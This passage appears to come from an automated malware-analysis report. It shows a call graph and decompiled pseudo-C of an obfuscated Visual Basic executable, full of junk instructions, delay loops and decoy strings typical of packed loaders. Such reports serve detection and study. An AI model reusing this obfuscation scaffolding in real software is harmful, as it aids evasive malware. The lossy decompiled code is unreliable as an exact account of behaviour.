__vbaStrToAnsi * 2 call 41169c __vbaSetSystemError __vbaFreeStrList 311->318 319 41411d-41418a __vbaChkstk * 2 __vbaLateMemCall 311->319 313 413ff0-414009 __vbaNew2 312->313 314 41400b 312->314 316 414015-414073 __vbaLateMemCallLd __vbaObjVar __vbaObjSetAddref 313->316 314->316 323 414095 316->323 324 414075-414093 __vbaHresultCheckObj 316->324 325 414264-414299 call 4116ec __vbaSetSystemError 318->325 326 414217-41425f #716 __vbaChkstk __vbaLateIdSt __vbaFreeVar 318->326 319->318 327 41409c-4140ad __vbaFreeObj __vbaFreeVar 323->327 324->327 330 41429b-4142e8 __vbaVarDup #600 __vbaFreeVar 325->330 331 4142ed-414318 call 41173c __vbaSetSystemError 325->331 326->325 327->311 330->331 334 4143cf-414448 __vbaStrCopy __vbaStrToAnsi call 4117b0 __vbaSetSystemError __vbaFreeStrList 331->334 335 41431e-4143cc __vbaVarDup #595 __vbaFreeVarList 331->335 338 41445b-414486 call 4117fc __vbaSetSystemError 334->338 339 41444a-414456 #532 334->339 335->334 342 414488-4144c6 __vbaVarDup #529 __vbaFreeVar 338->342 343 4144cb-414525 __vbaStrToAnsi call 411840 __vbaSetSystemError __vbaFreeStr 338->343 339->338 342->343 346 414527-414574 __vbaVarDup #600 __vbaFreeVar 343->346 347 414579-4145a9 call 411884 __vbaSetSystemError 343->347 346->347 350 414656-414686 call 4118cc __vbaSetSystemError 347->350 351 4145af-4145bd 347->351 357 41479b-4147c1 call 411914 __vbaSetSystemError 350->357 358 41468c-4146b7 350->358 353 4145da 351->353 354 4145bf-4145d8 __vbaNew2 351->354 356 4145e4-414622 __vbaObjSetAddref 353->356 354->356 361 414644 356->361 362 414624-414642 __vbaHresultCheckObj 356->362 366 4148f0-414945 __vbaStrToAnsi call 411970 __vbaSetSystemError __vbaFreeStr 357->366 367 4147c7-4148ed __vbaVarDup #596 __vbaStrMove __vbaFreeVarList 357->367 368 4146d9 358->368 369 4146b9-4146d7 __vbaHresultCheckObj 358->369 365 41464b-414651 __vbaFreeObj 361->365 362->365 365->350 375 414962-41497e _CIcos __vbaFpR8 366->375 376 414947-41495c #570 366->376 367->366 371 4146e0-4146e7 368->371 369->371 373 414704 371->373 374 4146e9-414702 __vbaNew2 371->374 377 41470e-414767 __vbaObjSet 373->377 374->377 378 414980-414987 __vbaEnd 375->378 379 41498c-414a5a __vbaFreeObj * 2 __vbaFreeVar * 2 __vbaFreeStr __vbaFreeObj * 3 375->379 376->375 382 414789 377->382 383 414769-414787 __vbaHresultCheckObj 377->383 378->379 384 414790-414796 __vbaFreeObj 382->384 383->384 384->357
          C-Code - Quality: 62%
          			E00406FFA(intOrPtr* __eax, void* __ebx, intOrPtr* __ecx, void* __edx) {
				signed int _t592;
				signed int _t612;
				signed int _t616;
				signed int _t638;
				signed int _t645;
				signed int _t659;
				signed int _t663;
				signed int _t669;
				signed int _t681;
				signed int _t687;
				signed int _t704;
				signed int _t709;
				void* _t717;
				void* _t718;
				void* _t721;
				void* _t725;
				intOrPtr _t726;
				short _t735;
				void* _t742;
				signed int _t743;
				signed int _t749;
				signed int _t751;
				signed int _t757;
				signed int _t758;
				signed int _t762;
				signed int _t763;
				signed int _t767;
				signed int _t785;
				void* _t789;
				void* _t794;
				void* _t810;
				void* _t811;
				signed int _t814;
				intOrPtr* _t817;
				void* _t819;
				void* _t821;
				void* _t868;
				void* _t869;
				intOrPtr* _t870;
				void* _t871;
				void* _t872;
				long long _t911;

				_t817 = __ecx;
				_push(ss);
				asm("int 0xb0");
				asm("lds eax, [eax]");
				 *__ecx =  *__ecx + __edx;
				 *__eax =  *__eax + __eax;
				asm("adc [eax], eax");
				 *__ecx =  *__ecx + __edx;
				 *__eax =  *__eax + __eax;
				asm("adc [eax], eax");
				 *__ecx =  *__ecx + __edx;
				 *__eax =  *__eax + __eax;
				asm("adc [eax], eax");
				 *__ecx =  *__ecx + __edx;
				 *__eax =  *__eax + __eax;
				asm("adc edx, edx");
				if(__ebx + __ebx == 0) {
					_push( *(_t868 - 0x250));
					L00401906();
				}
				asm("jecxz 0x0");
				 *((intOrPtr*)(_t817 - 0x2ab7b)) =  *((intOrPtr*)(_t817 - 0x2ab7b)) - 1;
				asm("invalid");
				_pop(es);
				 *((intOrPtr*)(_t868 - 4)) = 0x28;
				 *((short*)(_t868 - 0x228)) = 0x1a82;
				 *((long long*)(_t868 - 0x244)) =  *0x4013f8;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x73c))( *((intOrPtr*)(_t868 + 8)), 0x596b, _t868 - 0x244, _t868 - 0x228, _t868 - 0x22c);
				 *((short*)(_t868 - 0x6c)) =  *((intOrPtr*)(_t868 - 0x22c));
				 *((intOrPtr*)(_t868 - 4)) = 0x29;
				 *((intOrPtr*)(_t868 - 0x230)) = 0x2329eb;
				_t17 = _t868 - 0x230; // 0x2329eb
				 *_t870 =  *0x4013f0;
				_t592 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x70c))( *((intOrPtr*)(_t868 + 8)), _t817, _t817, _t17, 0x9d, 0x3b889c20, 0x5b06);
				 *(_t868 - 0x250) = _t592;
				if( *(_t868 - 0x250) >= 0) {
					_t26 = _t868 - 0x2b0;
					 *_t26 =  *(_t868 - 0x2b0) & 0x00000000;
					__eflags =  *_t26;
				} else {
					_push(0x70c);
					_push(0x4105e8);
					_push( *((intOrPtr*)(_t868 + 8)));
					_push( *(_t868 - 0x250));
					L00401906();
					 *(_t868 - 0x2b0) = _t592;
				}
				 *((intOrPtr*)(_t868 - 4)) = 0x2a;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x750))( *((intOrPtr*)(_t868 + 8)), _t868 - 0x244);
				 *((long long*)(_t868 - 0x88)) =  *((long long*)(_t868 - 0x244));
				 *((intOrPtr*)(_t868 - 4)) = 0x2b;
				 *((short*)(_t868 - 0x228)) = 0x1fe;
				 *((long long*)(_t868 - 0x244)) =  *0x4013e8;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x73c))( *((intOrPtr*)(_t868 + 8)), 0x1d56, _t868 - 0x244, _t868 - 0x228, _t868 - 0x22c);
				 *((short*)(_t868 - 0xdc)) =  *((intOrPtr*)(_t868 - 0x22c));
				 *((intOrPtr*)(_t868 - 4)) = 0x2c;
				 *((short*)(_t868 - 0x228)) = 0x37b;
				 *((intOrPtr*)(_t868 - 0x230)) =  *0x4013e0;
				 *_t870 =  *0x4013d8;
				_t50 = _t868 - 0x230; // 0x2329eb
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x758))( *((intOrPtr*)(_t868 + 8)), _t50, 0xdbe6dc20, 0x5af4, _t868 - 0x228, _t817, _t817);
				 *((intOrPtr*)(_t868 - 4)) = 0x2d;
				_t612 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x6fc))( *((intOrPtr*)(_t868 + 8)), _t868 - 0x228);
				 *(_t868 - 0x250) = _t612;
				if( *(_t868 - 0x250) >= 0) {
					_t64 = _t868 - 0x2b4;
					 *_t64 =  *(_t868 - 0x2b4) & 0x00000000;
					__eflags =  *_t64;
				} else {
					_push(0x6fc);
					_push(0x4105e8);
					_push( *((intOrPtr*)(_t868 + 8)));
					_push( *(_t868 - 0x250));
					L00401906();
					 *(_t868 - 0x2b4) = _t612;
				}
				 *((short*)(_t868 - 0xbc)) =  *((intOrPtr*)(_t868 - 0x228));
				 *((intOrPtr*)(_t868 - 4)) = 0x2e;
				_t616 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x6f8))( *((intOrPtr*)(_t868 + 8)));
				 *(_t868 - 0x250) = _t616;
				if( *(_t868 - 0x250) >= 0) {
					_t77 = _t868 - 0x2b8;
					 *_t77 =  *(_t868 - 0x2b8) & 0x00000000;
					__eflags =  *_t77;
				} else {
					_push(0x6f8);
					_push(0x4105e8);
					_push( *((intOrPtr*)(_t868 + 8)));
					_push( *(_t868 - 0x250));
					L00401906();
					 *(_t868 - 0x2b8) = _t616;
				}
				 *((intOrPtr*)(_t868 - 4)) = 0x2f;
				L004018F4();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x728))( *((intOrPtr*)(_t868 + 8)), 0x8904d3f8, _t868 - 0x134, 0x742e, _t868 - 0x244);
				 *((long long*)(_t868 - 0xd8)) =  *((long long*)(_t868 - 0x244));
				_t819 = _t868 - 0x134;
				L00401924();
				 *((intOrPtr*)(_t868 - 4)) = 0x30;
				 *((intOrPtr*)(_t868 - 0x230)) = 0x8904d3f8;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x740))( *((intOrPtr*)(_t868 + 8)), _t868 - 0x230, 0x98e72e79, _t868 - 0x244);
				 *((intOrPtr*)(_t868 - 0xd0)) =  *((intOrPtr*)(_t868 - 0x244));
				 *((intOrPtr*)(_t868 - 0xcc)) =  *((intOrPtr*)(_t868 - 0x240));
				 *((intOrPtr*)(_t868 - 4)) = 0x31;
				 *((long long*)(_t868 - 0x244)) =  *0x4013d0;
				 *_t870 =  *0x4013c8;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x754))( *((intOrPtr*)(_t868 + 8)), 0x3a20, _t868 - 0x244, _t819, _t868 - 0x228);
				 *((short*)(_t868 - 0xa8)) =  *((intOrPtr*)(_t868 - 0x228));
				 *((intOrPtr*)(_t868 - 4)) = 0x32;
				_t638 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x710))( *((intOrPtr*)(_t868 + 8)), _t868 - 0x244);
				 *(_t868 - 0x250) = _t638;
				if( *(_t868 - 0x250) >= 0) {
					_t119 = _t868 - 0x2bc;
					 *_t119 =  *(_t868 - 0x2bc) & 0x00000000;
					__eflags =  *_t119;
				} else {
					_push(0x710);
					_push(0x4105e8);
					_push( *((intOrPtr*)(_t868 + 8)));
					_push( *(_t868 - 0x250));
					L00401906();
					 *(_t868 - 0x2bc) = _t638;
				}
				 *((intOrPtr*)(_t868 - 0xf8)) =  *((intOrPtr*)(_t868 - 0x244));
				 *((intOrPtr*)(_t868 - 0xf4)) =  *((intOrPtr*)(_t868 - 0x240));
				 *((intOrPtr*)(_t868 - 4)) = 0x33;
				 *((long long*)(_t868 - 0x244)) =  *0x4013c0;
				_t645 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x708))( *((intOrPtr*)(_t868 + 8)), 0x98e72e79, _t868 - 0x244, 0x3457, 0x98e72e79, _t868 - 0x24c);
				 *(_t868 - 0x250) = _t645;
				if( *(_t868 - 0x250) >= 0) {
					_t137 = _t868 - 0x2c0;
					 *_t137 =  *(_t868 - 0x2c0) & 0x00000000;
					__eflags =  *_t137;
				} else {
					_push(0x708);
					_push(0x4105e8);
					_push( *((intOrPtr*)(_t868 + 8)));
					_push( *(_t868 - 0x250));
					L00401906();
					 *(_t868 - 0x2c0) = _t645;
				}
				 *((intOrPtr*)(_t868 - 0x128)) =  *((intOrPtr*)(_t868 - 0x24c));
				 *((intOrPtr*)(_t868 - 0x124)) =  *((intOrPtr*)(_t868 - 0x248));
				 *((intOrPtr*)(_t868 - 4)) = 0x34;
				 *((long long*)(_t868 - 0x244)) =  *0x4013b8;
				 *_t870 =  *0x4013b4;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x754))( *((intOrPtr*)(_t868 + 8)), 0x2821, _t868 - 0x244, _t819, _t868 - 0x228);
				 *((short*)(_t868 - 0xa4)) =  *((intOrPtr*)(_t868 - 0x228));
				 *((intOrPtr*)(_t868 - 4)) = 0x35;
				 *((short*)(_t868 - 0x228)) = 0x4ea1;
				 *((intOrPtr*)(_t868 - 0x230)) = 0x8904d3f8;
				_t659 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x714))( *((intOrPtr*)(_t868 + 8)), _t868 - 0x230, _t868 - 0x228, _t868 - 0x234);
				 *(_t868 - 0x250) = _t659;
				if( *(_t868 - 0x250) >= 0) {
					_t166 = _t868 - 0x2c4;
					 *_t166 =  *(_t868 - 0x2c4) & 0x00000000;
					__eflags =  *_t166;
				} else {
					_push(0x714);
					_push(0x4105e8);
					_push( *((intOrPtr*)(_t868 + 8)));
					_push( *(_t868 - 0x250));
					L00401906();
					 *(_t868 - 0x2c4) = _t659;
				}
				 *((intOrPtr*)(_t868 - 0xc8)) =  *((intOrPtr*)(_t868 - 0x234));
				 *((intOrPtr*)(_t868 - 4)) = 0x36;
				L004018EE();
				 *((intOrPtr*)(_t868 - 4)) = 0x37;
				_t663 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x1b8))( *((intOrPtr*)(_t868 + 8)), _t868 - 0x228, 0xffffffff);
				asm("fclex");
				 *(_t868 - 0x250) = _t663;
				if( *(_t868 - 0x250) >= 0) {
					_t181 = _t868 - 0x2c8;
					 *_t181 =  *(_t868 - 0x2c8) & 0x00000000;
					__eflags =  *_t181;
				} else {
					_push(0x1b8);
					_push(0x4105b8);
					_push( *((intOrPtr*)(_t868 + 8)));
					_push( *(_t868 - 0x250));
					L00401906();
					 *(_t868 - 0x2c8) = _t663;
				}
				_t669 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x1bc))( *((intOrPtr*)(_t868 + 8)), 0);
				asm("fclex");
				 *(_t868 - 0x254) = _t669;
				if( *(_t868 - 0x254) >= 0) {
					_t192 = _t868 - 0x2cc;
					 *_t192 =  *(_t868 - 0x2cc) & 0x00000000;
					__eflags =  *_t192;
				} else {
					_push(0x1bc);
					_push(0x4105b8);
					_push( *((intOrPtr*)(_t868 + 8)));
					_push( *(_t868 - 0x254));
					L00401906();
					 *(_t868 - 0x2cc) = _t669;
				}
				 *((intOrPtr*)(_t868 - 4)) = 0x38;
				 *(_t868 - 0x1bc) =  *(_t868 - 0x1bc) & 0x00000000;
				 *(_t868 - 0x1b8) =  *(_t868 - 0x1b8) & 0x00000000;
				 *((intOrPtr*)(_t868 - 0x1c4)) = 6;
				L004018E8();
				while(1) {
					 *((intOrPtr*)(_t868 - 4)) = 0x3a;
					 *(_t868 - 0x1bc) = 1;
					 *((intOrPtr*)(_t868 - 0x1c4)) = 2;
					L004018E2();
					_t821 = _t868 - 0x80;
					L004018E8();
					 *((intOrPtr*)(_t868 - 4)) = 0x3b;
					 *((short*)(_t868 - 0x228)) = 0x1e2c;
					 *((intOrPtr*)(_t868 - 0x230)) =  *0x4013b0;
					 *_t870 =  *0x4013a8;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x758))( *((intOrPtr*)(_t868 + 8)), _t868 - 0x230, 0x539a9640, 0x5af4, _t868 - 0x228, _t821, _t821, _t868 - 0x154, _t868 - 0x1c4, _t868 - 0x80);
					 *((intOrPtr*)(_t868 - 4)) = 0x3c;
					_t681 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x704))( *((intOrPtr*)(_t868 + 8)), _t868 - 0x230);
					 *(_t868 - 0x250) = _t681;
					if( *(_t868 - 0x250) >= 0) {
						_t227 = _t868 - 0x2d0;
						 *_t227 =  *(_t868 - 0x2d0) & 0x00000000;
						__eflags =  *_t227;
					} else {
						_push(0x704);
						_push(0x4105e8);
						_push( *((intOrPtr*)(_t868 + 8)));
						_push( *(_t868 - 0x250));
						L00401906();
						 *(_t868 - 0x2d0) = _t681;
					}
					 *((intOrPtr*)(_t868 - 0x60)) =  *((intOrPtr*)(_t868 - 0x230));
					 *((intOrPtr*)(_t868 - 4)) = 0x3d;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x738))( *((intOrPtr*)(_t868 + 8)));
					 *((intOrPtr*)(_t868 - 4)) = 0x3e;
					_t687 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x6f8))( *((intOrPtr*)(_t868 + 8)));
					 *(_t868 - 0x250) = _t687;
					if( *(_t868 - 0x250) >= 0) {
						_t244 = _t868 - 0x2d4;
						 *_t244 =  *(_t868 - 0x2d4) & 0x00000000;
						__eflags =  *_t244;
					} else {
						_push(0x6f8);
						_push(0x4105e8);
						_push( *((intOrPtr*)(_t868 + 8)));
						_push( *(_t868 - 0x250));
						L00401906();
						 *(_t868 - 0x2d4) = _t687;
					}
					 *((intOrPtr*)(_t868 - 4)) = 0x3f;
					 *((short*)(_t868 - 0x228)) = 0x1854;
					 *((long long*)(_t868 - 0x244)) =  *0x401458;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x724))( *((intOrPtr*)(_t868 + 8)), _t868 - 0x244, 0xbb1ac, _t868 - 0x228, _t868 - 0x24c);
					 *((long long*)(_t868 - 0x120)) =  *((long long*)(_t868 - 0x24c));
					 *((intOrPtr*)(_t868 - 4)) = 0x40;
					 *((short*)(_t868 - 0x228)) = 0x5bd9;
					 *((long long*)(_t868 - 0x244)) =  *0x401450;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x73c))( *((intOrPtr*)(_t868 + 8)), 0x37b, _t868 - 0x244, _t868 - 0x228, _t868 - 0x22c);
					 *((short*)(_t868 - 0x118)) =  *((intOrPtr*)(_t868 - 0x22c));
					 *((intOrPtr*)(_t868 - 4)) = 0x41;
					_t704 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x6fc))( *((intOrPtr*)(_t868 + 8)), _t868 - 0x228);
					 *(_t868 - 0x250) = _t704;
					if( *(_t868 - 0x250) >= 0) {
						_t278 = _t868 - 0x2d8;
						 *_t278 =  *(_t868 - 0x2d8) & 0x00000000;
						__eflags =  *_t278;
					} else {
						_push(0x6fc);
						_push(0x4105e8);
						_push( *((intOrPtr*)(_t868 + 8)));
						_push( *(_t868 - 0x250));
						L00401906();
						 *(_t868 - 0x2d8) = _t704;
					}
					 *((short*)(_t868 - 0x114)) =  *((intOrPtr*)(_t868 - 0x228));
					 *((intOrPtr*)(_t868 - 4)) = 0x42;
					_t709 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x718))( *((intOrPtr*)(_t868 + 8)), _t868 - 0x230);
					 *(_t868 - 0x250) = _t709;
					if( *(_t868 - 0x250) >= 0) {
						_t292 = _t868 - 0x2dc;
						 *_t292 =  *(_t868 - 0x2dc) & 0x00000000;
						__eflags =  *_t292;
					} else {
						_push(0x718);
						_push(0x4105e8);
						_push( *((intOrPtr*)(_t868 + 8)));
						_push( *(_t868 - 0x250));
						L00401906();
						 *(_t868 - 0x2dc) = _t709;
					}
					 *((intOrPtr*)(_t868 - 0xe4)) =  *((intOrPtr*)(_t868 - 0x230));
					 *((intOrPtr*)(_t868 - 4)) = 0x43;
					L004018F4();
					 *((short*)(_t868 - 0x228)) = 0x5b73;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x72c))( *((intOrPtr*)(_t868 + 8)), _t868 - 0x228, _t868 - 0x134, _t868 - 0x244);
					_t911 =  *((long long*)(_t868 - 0x244));
					 *((long long*)(_t868 - 0x2c)) = _t911;
					L00401924();
					 *((intOrPtr*)(_t868 - 4)) = 0x44;
					 *(_t868 - 0x1bc) = 0x2ffff;
					 *((intOrPtr*)(_t868 - 0x1c4)) = 0x8003;
					_push(_t868 - 0x80);
					_t717 = _t868 - 0x1c4;
					_push(_t717);
					L004018DC();
					_t718 = _t717;
					if(_t718 == 0) {
						break;
					}
				}
				 *((intOrPtr*)(_t868 - 4)) = 0x47;
				 *(_t868 - 0x1bc) = 0xe8;
				do {
					_t718 = _t718 + 1;
					__eflags = _t718 - 0xfff9a646;
				} while (_t718 != 0xfff9a646);
				 *_t870(_t718 + 0x46f11c);
				_t869 = _t868 - 1;
				asm("movsb");
				L004018E8();
				 *((intOrPtr*)(_t869 - 4)) = 0x48;
				 *((intOrPtr*)(_t869 - 0x238)) = 0x8904d3f8;
				 *((intOrPtr*)(_t869 - 0x234)) = 0x98e72e79;
				 *(_t869 - 0x230) = 0x5f72a;
				_push(0x98e72e79);
				_push(L"bangsternears");
				_t721 = _t869 - 0x13c;
				_push(_t721);
				L004018D6();
				_push(_t721);
				_push(_t869 - 0x238);
				_push(_t869 - 0x234);
				_push(_t869 - 0x230);
				_push(0x8310a4);
				_push(L"samtaleemnetsrhes");
				_t725 = _t869 - 0x138;
				_push(_t725);
				L004018D6();
				_push(_t725);
				_push(L"Charcuterieganocephalantu");
				_t726 = _t869 - 0x134;
				_push(_t726);
				L004018D6();
				_push(_t726);
				E004115F4();
				 *((intOrPtr*)(_t869 - 0x23c)) = _t726;
				L004018D0();
				__eflags =  *((intOrPtr*)(_t869 - 0x23c)) - 0x8904d3f8;
				 *(_t869 - 0x250) =  ~(0 |  *((intOrPtr*)(_t869 - 0x23c)) == 0x8904d3f8);
				_push(_t869 - 0x13c);
				_push(_t869 - 0x138);
				_push(_t869 - 0x134);
				_push(3);
				L004018CA();
				_t871 = _t870 + 0x10;
				__eflags =  *(_t869 - 0x250);
				if( *(_t869 - 0x250) != 0) {
					 *((intOrPtr*)(_t869 - 4)) = 0x49;
					 *((intOrPtr*)(_t869 - 4)) = 0x4a;
					__eflags =  *0x4183d8;
					if( *0x4183d8 != 0) {
						 *(_t869 - 0x2e0) = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x411ae0);
						L004018C4();
						 *(_t869 - 0x2e0) = 0x4183d8;
					}
					 *(_t869 - 0x250) =  *( *(_t869 - 0x2e0));
					_t810 = _t869 - 0x154;
					L004018B2();
					_t871 = _t871 + 0x10;
					L004018B8();
					_t811 = _t869 - 0x140;
					L004018BE();
					_t814 =  *((intOrPtr*)( *( *(_t869 - 0x250)) + 0xc))( *(_t869 - 0x250), _t811, _t811, _t810, _t810, _t810,  *((intOrPtr*)(_t869 - 0xa0)), L"M9uACtmJ7nAtSvje8kbN9w249", 0);
					asm("fclex");
					 *(_t869 - 0x254) = _t814;
					__eflags =  *(_t869 - 0x254);
					if( *(_t869 - 0x254) >= 0) {
						_t351 = _t869 - 0x2e4;
						 *_t351 =  *(_t869 - 0x2e4) & 0x00000000;
						__eflags =  *_t351;
					} else {
						_push(0xc);
						_push(0x411ad0);
						_push( *(_t869 - 0x250));
						_push( *(_t869 - 0x254));
						L00401906();
						 *(_t869 - 0x2e4) = _t814;
					}
					L004018AC();
					L00401912();
				}
				 *((intOrPtr*)(_t869 - 4)) = 0x4c;
				 *(_t869 - 0x230) = 0x792720;
				_t357 = _t869 - 0x230; // 0x792720
				_push(L"bangsternears");
				_t735 = _t869 - 0x134;
				_push(_t735);
				L004018D6();
				_push(_t735);
				E0041165C();
				 *((short*)(_t869 - 0x228)) = _t735;
				L004018D0();
				asm("sbb eax, eax");
				 *(_t869 - 0x250) =  ~( ~( *((short*)(_t869 - 0x228)) - 0x8904d3f8) + 1);
				L00401924();
				__eflags =  *(_t869 - 0x250);
				if( *(_t869 - 0x250) != 0) {
					 *((intOrPtr*)(_t869 - 4)) = 0x4d;
					 *((intOrPtr*)(_t869 - 4)) = 0x4e;
					 *(_t869 - 0x1bc) = L"rebslagerierneshand";
					 *((intOrPtr*)(_t869 - 0x1c4)) = 8;
					 *((intOrPtr*)(_t869 - 0x1dc)) = 0x6e5392;
					 *((intOrPtr*)(_t869 - 0x1e4)) = 3;
					_push(0x10);
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(2);
					_push(L"EAuxmqjme0cZFWWnSnEvZMsikYtH2nYa25");
					_push( *((intOrPtr*)(_t869 - 0x24)));
					L004018FA();
					_t871 = _t871 + 0x2c;
				}
				 *((intOrPtr*)(_t869 - 4)) = 0x50;
				_push(0x8904d3f8);
				_push(L"Statscheferstronhi8");
				_t742 = _t869 - 0x138;
				_push(_t742);
				L004018D6();
				_push(_t742);
				_push(L"encryptions");
				_t743 = _t869 - 0x134;
				_push(_t743);
				L004018D6();
				_push(_t743);
				_push(0x753eca);
				_push(0x3db7db);
				_push(0x8904d3f8);
				E0041169C();
				 *(_t869 - 0x230) = _t743;
				L004018D0();
				__eflags =  *(_t869 - 0x230) - 0x98e72e79;
				 *(_t869 - 0x250) =  ~(0 |  *(_t869 - 0x230) == 0x98e72e79);
				_push(_t869 - 0x138);
				_push(_t869 - 0x134);
				_push(2);
				L004018CA();
				_t872 = _t871 + 0xc;
				_t749 =  *(_t869 - 0x250);
				__eflags = _t749;
				if(_t749 != 0) {
					 *((intOrPtr*)(_t869 - 4)) = 0x51;
					 *((intOrPtr*)(_t869 - 4)) = 0x52;
					_push(0);
					_push(L"sykofanter");
					_push(_t869 - 0x154);
					L00401918();
					_t749 = 0x10;
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push( *((intOrPtr*)(_t869 - 0x104)));
					L0040191E();
					L00401912();
				}
				 *((intOrPtr*)(_t869 - 4)) = 0x54;
				_push(0x3a3aea);
				_push(0x8904d3f8);
				_push(0x98e72e79);
				_push(0x98e72e79);
				E004116EC();
				 *(_t869 - 0x230) = _t749;
				L004018D0();
				__eflags =  *(_t869 - 0x230) - 0x404672;
				if( *(_t869 - 0x230) == 0x404672) {
					 *((intOrPtr*)(_t869 - 4)) = 0x55;
					 *((intOrPtr*)(_t869 - 4)) = 0x56;
					 *(_t869 - 0x1bc) = L"rebslagerierneshand";
					 *((intOrPtr*)(_t869 - 0x1c4)) = 8;
					L004018A0();
					_push(2);
					_t749 = _t869 - 0x154;
					_push(_t749);
					L004018A6();
					 *((long long*)(_t869 - 0xc4)) = _t911;
					L00401912();
				}
				 *((intOrPtr*)(_t869 - 4)) = 0x58;
				_push(0x350dde);
				_push(0x58e1c9);
				E0041173C();
				 *(_t869 - 0x230) = _t749;
				L004018D0();
				__eflags =  *(_t869 - 0x230) - 0x5bdd58;
				if( *(_t869 - 0x230) == 0x5bdd58) {
					 *((intOrPtr*)(_t869 - 4)) = 0x59;
					 *((intOrPtr*)(_t869 - 0x17c)) = 0x80020004;
					 *((intOrPtr*)(_t869 - 0x184)) = 0xa;
					 *((intOrPtr*)(_t869 - 0x16c)) = 0x80020004;
					 *((intOrPtr*)(_t869 - 0x174)) = 0xa;
					 *((intOrPtr*)(_t869 - 0x15c)) = 0x80020004;
					 *((intOrPtr*)(_t869 - 0x164)) = 0xa;
					 *(_t869 - 0x1bc) = L"Charcuterieganocephalantu";
					 *((intOrPtr*)(_t869 - 0x1c4)) = 8;
					L004018A0();
					_push(_t869 - 0x184);
					_push(_t869 - 0x174);
					_push(_t869 - 0x164);
					_push(0);
					_push(_t869 - 0x154);
					L0040189A();
					_push(_t869 - 0x184);
					_push(_t869 - 0x174);
					_push(_t869 - 0x164);
					_t749 = _t869 - 0x154;
					_push(_t749);
					_push(4);
					L00401942();
					_t872 = _t872 + 0x14;
				}
				 *((intOrPtr*)(_t869 - 4)) = 0x5b;
				L004018F4();
				_push(_t749);
				_push(_t869 - 0x138);
				L004018D6();
				_push(0x8904d3f8);
				_t751 = _t869 - 0x138;
				_push(_t751);
				E004117B0();
				 *(_t869 - 0x230) = _t751;
				L004018D0();
				__eflags =  *(_t869 - 0x230) - 0x272878;
				 *(_t869 - 0x250) =  ~(0 |  *(_t869 - 0x230) == 0x00272878);
				_push(_t869 - 0x138);
				_push(_t869 - 0x134);
				_push(2);
				L004018CA();
				_t757 =  *(_t869 - 0x250);
				__eflags = _t757;
				if(_t757 != 0) {
					 *((intOrPtr*)(_t869 - 4)) = 0x5c;
					_push(L"LAANELOFTERNE");
					L00401894();
				}
				 *((intOrPtr*)(_t869 - 4)) = 0x5e;
				_push(0x8904d3f8);
				_push(0xd2930);
				E004117FC();
				 *(_t869 - 0x230) = _t757;
				L004018D0();
				__eflags =  *(_t869 - 0x230) - 0x8904d3f8;
				if( *(_t869 - 0x230) == 0x8904d3f8) {
					 *((intOrPtr*)(_t869 - 4)) = 0x5f;
					 *(_t869 - 0x1bc) = L"samtaleemnetsrhes";
					 *((intOrPtr*)(_t869 - 0x1c4)) = 8;
					L004018A0();
					_push(_t869 - 0x154);
					L0040188E();
					L00401912();
				}
				 *((intOrPtr*)(_t869 - 4)) = 0x61;
				_push(L"Gooiest4");
				_t758 = _t869 - 0x134;
				_push(_t758);
				L004018D6();
				_push(_t758);
				_push(0x98e72e79);
				E00411840();
				 *(_t869 - 0x230) = _t758;
				L004018D0();
				__eflags =  *(_t869 - 0x230) - 0x86be28;
				 *(_t869 - 0x250) =  ~(0 |  *(_t869 - 0x230) == 0x0086be28);
				L00401924();
				_t762 =  *(_t869 - 0x250);
				__eflags = _t762;
				if(_t762 != 0) {
					 *((intOrPtr*)(_t869 - 4)) = 0x62;
					 *((intOrPtr*)(_t869 - 4)) = 0x63;
					 *(_t869 - 0x1bc) = L"Porto7";
					 *((intOrPtr*)(_t869 - 0x1c4)) = 8;
					L004018A0();
					_push(2);
					_t762 = _t869 - 0x154;
					_push(_t762);
					L004018A6();
					 *((long long*)(_t869 - 0x9c)) = _t911;
					L00401912();
				}
				 *((intOrPtr*)(_t869 - 4)) = 0x65;
				_push(0x753f16);
